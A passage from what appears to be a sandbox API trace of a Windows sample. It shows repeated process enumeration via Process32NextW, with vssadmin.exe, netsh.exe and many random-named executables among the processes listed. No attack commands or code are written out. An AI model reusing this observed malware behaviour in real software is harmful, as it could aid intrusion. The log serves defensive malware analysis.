cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0068.183] GetLastError () returned 0x12 [0068.183] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0068.184] GetLastError () returned 0x12 [0068.184] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0068.185] GetLastError () returned 0x12 [0068.186] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0068.186] GetLastError () returned 0x12 [0068.187] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0068.187] GetLastError () returned 0x12 [0068.187] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0068.188] GetLastError () returned 0x12 [0068.188] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0068.189] GetLastError () returned 0x12 [0068.189] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0068.190] GetLastError () returned 0x12 [0068.190] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.190] GetLastError () returned 0x12 [0068.190] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0068.286] GetLastError () returned 0x12 [0068.286] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0068.290] CloseHandle (hObject=0x320) returned 1 [0068.494] Sleep (dwMilliseconds=0x1f4) [0069.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x330 [0069.426] Process32FirstW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.427] GetLastError () returned 0x12 [0069.427] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0069.428] GetLastError () returned 0x12 [0069.428] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0069.429] GetLastError () returned 0x12 [0069.429] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0069.430] GetLastError () returned 0x12 [0069.430] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0069.430] GetLastError () returned 0x12 [0069.430] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0069.431] GetLastError () returned 0x12 [0069.431] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0069.432] GetLastError () returned 0x12 [0069.432] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0069.432] GetLastError () returned 0x12 [0069.433] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0069.433] GetLastError () returned 0x12 [0069.433] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.434] GetLastError () returned 0x12 [0069.434] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0069.435] GetLastError () returned 0x12 [0069.435] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0069.436] GetLastError () returned 0x12 [0069.436] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.437] GetLastError () returned 0x12 [0069.437] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0069.437] GetLastError () returned 0x12 [0069.437] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.438] GetLastError () returned 0x12 [0069.438] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.439] GetLastError () returned 0x12 [0069.439] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.439] GetLastError () returned 0x12 [0069.439] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.440] GetLastError () returned 0x12 [0069.440] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.441] GetLastError () returned 0x12 [0069.441] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.441] GetLastError () returned 0x12 [0069.442] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.442] GetLastError () returned 0x12 [0069.442] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.443] GetLastError () returned 0x12 [0069.443] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.444] GetLastError () returned 0x12 [0069.444] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0069.444] GetLastError () returned 0x12 [0069.445] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.445] GetLastError () returned 0x12 [0069.445] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.446] GetLastError () returned 0x12 [0069.446] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0069.447] GetLastError () returned 0x12 [0069.447] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0069.447] GetLastError () returned 0x12 [0069.447] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.448] GetLastError () returned 0x12 [0069.448] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0069.449] GetLastError () returned 0x12 [0069.449] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0069.450] GetLastError () returned 0x12 [0069.450] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0069.450] GetLastError () returned 0x12 [0069.450] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0069.451] GetLastError () returned 0x12 [0069.451] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0069.452] GetLastError () returned 0x12 [0069.452] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0069.452] GetLastError () returned 0x12 [0069.452] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0069.453] GetLastError () returned 0x12 [0069.453] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0069.454] GetLastError () returned 0x12 [0069.454] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0069.454] GetLastError () returned 0x12 [0069.455] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0069.547] GetLastError () returned 0x12 [0069.547] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0069.548] GetLastError () returned 0x12 [0069.548] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0069.548] GetLastError () returned 0x12 [0069.548] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0069.549] GetLastError () returned 0x12 [0069.549] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0069.550] GetLastError () returned 0x12 [0069.550] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0069.550] GetLastError () returned 0x12 [0069.551] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0069.551] GetLastError () returned 0x12 [0069.551] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0069.552] GetLastError () returned 0x12 [0069.552] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0069.553] GetLastError () returned 0x12 [0069.553] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0069.553] GetLastError () returned 0x12 [0069.554] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0069.554] GetLastError () returned 0x12 [0069.554] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0069.555] GetLastError () returned 0x12 [0069.555] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0069.555] GetLastError () returned 0x12 [0069.555] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0069.556] GetLastError () returned 0x12 [0069.556] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0069.557] GetLastError () returned 0x12 [0069.557] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0069.558] GetLastError () returned 0x12 [0069.558] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0069.559] GetLastError () returned 0x12 [0069.559] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0069.559] GetLastError () returned 0x12 [0069.560] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0069.560] GetLastError () returned 0x12 [0069.560] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0069.561] GetLastError () returned 0x12 [0069.561] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0069.562] GetLastError () returned 0x12 [0069.562] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0069.563] GetLastError () returned 0x12 [0069.563] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0069.563] GetLastError () returned 0x12 [0069.563] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0069.564] GetLastError () returned 0x12 [0069.564] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0069.565] GetLastError () returned 0x12 [0069.565] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0069.566] GetLastError () returned 0x12 [0069.566] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, 